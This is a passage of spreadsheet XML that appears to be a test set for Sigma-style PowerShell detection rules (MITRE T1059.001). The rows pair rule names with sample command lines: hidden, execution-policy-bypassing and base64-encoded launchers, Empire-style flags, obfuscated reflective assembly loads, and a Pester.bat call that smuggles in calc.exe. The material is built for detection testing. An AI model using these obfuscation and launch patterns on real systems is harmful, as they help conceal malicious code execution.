      </c>
      <c r="E3735" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('...')) | iex"</t>
        </is>
      </c>
      <c r="F3735" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3735" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3735" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3735" s="43" t="n"/>
      <c r="J3735" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3735" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3736" ht="15.75" customHeight="1" s="42">
      <c r="A3736" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3736" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3736" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3736" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3736" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$a = 'j'; $b = 'oin'; $c = 'spl'; $d = 'it'; $cmd = $a+$b+' '+$c+$d; Invoke-Expression ('Write-Host ' + $cmd)"</t>
        </is>
      </c>
      <c r="F3736" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3736" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3736" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3736" s="43" t="n"/>
      <c r="J3736" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3736" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3737" ht="15.75" customHeight="1" s="42">
      <c r="A3737" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3737" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3737" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3737" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3737" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$a = 'jo'; $b = 'in'; $c = 'spl'; $d = 'it'; $cmd = $a+$b+' '+$c+$d; Invoke-Expression ('Write-Host ' + $cmd)"</t>
        </is>
      </c>
      <c r="F3737" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3737" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3737" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3737" s="43" t="n"/>
      <c r="J3737" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3737" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3738" ht="15.75" customHeight="1" s="42">
      <c r="A3738" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3738" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_launch</t>
        </is>
      </c>
      <c r="C3738" s="43" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell Launch Parameters</t>
        </is>
      </c>
      <c r="D3738" s="43" t="inlineStr">
        <is>
          <t>79f4ede3-402e-41c8-bc3e-ebbf5f162581</t>
        </is>
      </c>
      <c r="E3738" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -sta -NoP -NonI -W Hidden -Enc JAB0AGUAcwB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F3738" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3738" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3738" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3738" s="43" t="n"/>
      <c r="J3738" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3738" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3739" ht="15.75" customHeight="1" s="42">
      <c r="A3739" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3739" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_launch</t>
        </is>
      </c>
      <c r="C3739" s="43" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell Launch Parameters</t>
        </is>
      </c>
      <c r="D3739" s="43" t="inlineStr">
        <is>
          <t>79f4ede3-402e-41c8-bc3e-ebbf5f162581</t>
        </is>
      </c>
      <c r="E3739" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoP -sta -NonI -W1 -Enc JAB0AGUAcwB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F3739" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3739" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3739" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3739" s="43" t="n"/>
      <c r="J3739" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3739" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3740" ht="15.75" customHeight="1" s="42">
      <c r="A3740" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3740" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_launch</t>
        </is>
      </c>
      <c r="C3740" s="43" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell Launch Parameters</t>
        </is>
      </c>
      <c r="D3740" s="43" t="inlineStr">
        <is>
          <t>79f4ede3-402e-41c8-bc3e-ebbf5f162581</t>
        </is>
      </c>
      <c r="E3740" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoP -sta -NonI -W Hidden -Enc JAB0AGUAcwB0AD0AMQA= -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F3740" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3740" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3740" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3740" s="43" t="n"/>
      <c r="J3740" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3740" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3741" ht="15.75" customHeight="1" s="42">
      <c r="A3741" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3741" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_launch</t>
        </is>
      </c>
      <c r="C3741" s="43" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell Launch Parameters</t>
        </is>
      </c>
      <c r="D3741" s="43" t="inlineStr">
        <is>
          <t>79f4ede3-402e-41c8-bc3e-ebbf5f162581</t>
        </is>
      </c>
      <c r="E3741" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -sta -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand JAB0AGUAcwB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F3741" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3741" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3741" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3741" s="43" t="n"/>
      <c r="J3741" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3741" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3742" ht="15.75" customHeight="1" s="42">
      <c r="A3742" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3742" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pester_1</t>
        </is>
      </c>
      <c r="C3742" s="43" t="inlineStr">
        <is>
          <t>Execute Code with Pester.bat</t>
        </is>
      </c>
      <c r="D3742" s="43" t="inlineStr">
        <is>
          <t>59e938ff-0d6d-4dc3-b13f-36cc28734d4e</t>
        </is>
      </c>
      <c r="E3742" s="43" t="inlineStr">
        <is>
          <t>Pester.bat 'calc.exe; Get-Process'</t>
        </is>
      </c>
      <c r="F3742" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3742" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3742" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3742" s="43" t="n"/>
      <c r="J3742" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3742" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3743" ht="15.75" customHeight="1" s="42">
      <c r="A3743" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3743" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd</t>
        </is>
      </c>
      <c r="C3743" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line</t>
        </is>
      </c>
      <c r="D3743" s="43" t="inlineStr">
        <is>
          <t>ca2092a1-c273-4878-9b4b-0d60115bf5ea</t>
        </is>
      </c>
      <c r="E3743" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc dwBoAG8AYQBtAGkA</t>
        </is>
      </c>
      <c r="F3743" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3743" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3743" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3743" s="43" t="n"/>
      <c r="J3743" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3743" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3744" ht="15.75" customHeight="1" s="42">
      <c r="A3744" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3744" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd</t>
        </is>
      </c>
      <c r="C3744" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line</t>
        </is>
      </c>
      <c r="D3744" s="43" t="inlineStr">
        <is>
          <t>ca2092a1-c273-4878-9b4b-0d60115bf5ea</t>
        </is>
      </c>
      <c r="E3744" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand"dwBoAG8AYQBtAGkA"</t>
        </is>
      </c>
      <c r="F3744" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3744" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3744" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3744" s="43" t="n"/>
      <c r="J3744" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3744" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3745" ht="15.75" customHeight="1" s="42">
      <c r="A3745" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3745" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd</t>
        </is>
      </c>
      <c r="C3745" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line</t>
        </is>
      </c>
      <c r="D3745" s="43" t="inlineStr">
        <is>
          <t>ca2092a1-c273-4878-9b4b-0d60115bf5ea</t>
        </is>
      </c>
      <c r="E3745" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand dwBoAG8AYQBtAGkA</t>
        </is>
      </c>
      <c r="F3745" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3745" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3745" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3745" s="43" t="n"/>
      <c r="J3745" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3745" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3746" ht="15.75" customHeight="1" s="42">
      <c r="A3746" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3746" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C3746" s="43" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D3746" s="43" t="inlineStr">
        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E3746" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -EncodedCommand "QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg=="</t>
        </is>
      </c>
      <c r="F3746" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3746" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3746" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3746" s="43" t="n"/>
      <c r="J3746" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3746" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3747" ht="15.75" customHeight="1" s="42">
      <c r="A3747" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3747" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C3747" s="43" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D3747" s="43" t="inlineStr">
        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E3747" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w hidden -EncodedCommand QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg==</t>
        </is>
      </c>
      <c r="F3747" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3747" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3747" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3747" s="43" t="n"/>
      <c r="J3747" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3747" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3748" ht="15.75" customHeight="1" s="42">
      <c r="A3748" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3748" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C3748" s="43" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D3748" s="43" t="inlineStr">
        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E3748" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg==</t>
        </is>
      </c>
      <c r="F3748" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3748" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3748" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3748" s="43" t="n"/>
      <c r="J3748" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3748" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3749" ht="15.75" customHeight="1" s="42">
      <c r="A3749" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3749" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C3749" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D3749" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E3749" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA</t>
        </is>
      </c>
      <c r="F3749" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3749" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3749" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3749" s="43" t="n"/>
      <c r="J3749" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3749" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3750" ht="15.75" customHeight="1" s="42">
      <c r="A3750" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3750" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C3750" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D3750" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E3750" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -enc SQBgAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAiAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEIAeQBwAGEAcwBzACAAVABlAHMAdAAnACIA</t>
        </is>
      </c>
      <c r="F3750" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3750" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3750" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3750" s="43" t="n"/>
      <c r="J3750" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3750" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3751" ht="15.75" customHeight="1" s="42">
      <c r="A3751" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3751" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3751" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3751" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3751" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA==</t>
        </is>
      </c>
      <c r="F3751" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3751" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3751" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3751" s="43" t="n"/>
      <c r="J3751" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3751" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3752" ht="15.75" customHeight="1" s="42">
      <c r="A3752" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3752" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3752" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3752" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3752" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand IAAoAFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAC4ASQBuAHYAbwBrAGUAKAAkAGIAeQB0AGUAcwApACkAcwA=</t>
        </is>
      </c>
      <c r="F3752" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3752" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3752" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3752" s="43" t="n"/>
      <c r="J3752" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3752" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3753" ht="15.75" customHeight="1" s="42">
      <c r="A3753" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3753" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3753" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3753" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3753" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { [System.Reflection.Assembly]::Load([Convert]::FromBase64String('WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA==')) }"</t>
        </is>
      </c>
      <c r="F3753" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3753" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3753" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3753" s="43" t="n"/>
      <c r="J3753" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3753" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3754" ht="15.75" customHeight="1" s="42">
      <c r="A3754" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3754" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C3754" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D3754" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E3754" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA==')) }"</t>
        </is>
      </c>
      <c r="F3754" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3754" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3754" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3754" s="43" t="n"/>
      <c r="J3754" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3754" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3755" ht="15.75" customHeight="1" s="42">
      <c r="A3755" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3755" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3755" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3755" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3755" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::( [char]76 + [char]111 + [char]97 + [char]100 ).Invoke($data)"</t>
        </is>
      </c>
      <c r="F3755" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3755" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3755" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3755" s="43" t="n"/>
      <c r="J3755" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3755" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3756" ht="15.75" customHeight="1" s="42">
      <c r="A3756" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3756" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3756" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3756" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3756" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::( [string]::Concat('L','o','a','d') ).Invoke($data)"</t>
        </is>
      </c>
      <c r="F3756" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3756" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3756" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3756" s="43" t="n"/>
      <c r="J3756" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3756" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3757" ht="15.75" customHeight="1" s="42">
      <c r="A3757" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3757" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3757" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3757" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3757" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::( 'L' + 'oad' ).Invoke($data)"</t>
        </is>
      </c>
      <c r="F3757" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3757" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3757" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3757" s="43" t="n"/>
      <c r="J3757" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3757" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3758" ht="15.75" customHeight="1" s="42">
      <c r="A3758" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3758" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C3758" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D3758" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E3758" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::( [System.String]::Format( '{0}{1}', 'Lo', 'ad' ) ).Invoke($data)"</t>
        </is>
      </c>
      <c r="F3758" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3758" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3758" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3758" s="43" t="n"/>
      <c r="J3758" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3758" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3759" ht="15.75" customHeight="1" s="42">
      <c r="A3759" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3759" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3759" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3759" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3759" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName 'Win32_ShadowCopy'"</t>
        </is>
      </c>
      <c r="F3759" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3759" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3759" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3759" s="43" t="n"/>
      <c r="J3759" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3759" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3760" ht="15.75" customHeight="1" s="42">
      <c r="A3760" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3760" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3760" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3760" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3760" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32" + "_" + "ShadowCopy")"</t>
        </is>
      </c>
      <c r="F3760" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3760" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3760" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3760" s="43" t="n"/>
      <c r="J3760" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3760" s="43" t="b">
        <v>0</v>
      </c>
    </row>
